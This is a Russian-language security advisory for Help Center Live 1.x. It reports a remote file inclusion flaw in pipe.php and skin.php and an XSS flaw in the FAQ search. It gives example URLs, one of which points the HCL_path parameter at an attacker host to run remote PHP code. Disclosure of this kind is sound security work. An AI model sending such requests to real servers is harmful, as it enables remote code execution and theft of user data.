Выполнение произвольных команд в Help Center Live

Дата публикации:
27.12.2004
Всего просмотров:
26215
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Раскрытие важных данных
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Help Center Live 1.x
Уязвимые версии: Help Center Live все версии

Описание:
Обнаружена уязвимость в Help Center Live. Удаленный атакующий может произвести XSS атаку и выполнить произвольные команды на целевой системе.

Удаленный атакующий может послать специально сформированный 'HCL_path' параметр сценариям 'pipe.php' и 'skin.php' и выполнить произвольный php сценарий. PHP код, включая системные команды, будут выполнены с привилегиями текущего web сервера. Пример:

http://[target]/inc/pipe.php?HCL_path=ht tp://[attacker]

Сценарий 'index.php' некорректно обрабатывает входные данные параметра 'find'. Удаленный атакующий может произвести XSS атаку и получить доступ к важным данным пользователей. Пример:

http://[target]/faq/index.php?find=[CODEGOESHERE]&search=Search

URL производителя: www.helpcentrelive.com

Решение: Решение не существует на данный момент.

Ссылки: Critical Vulnerability In Help Center Live

или введите имя

CAPTCHA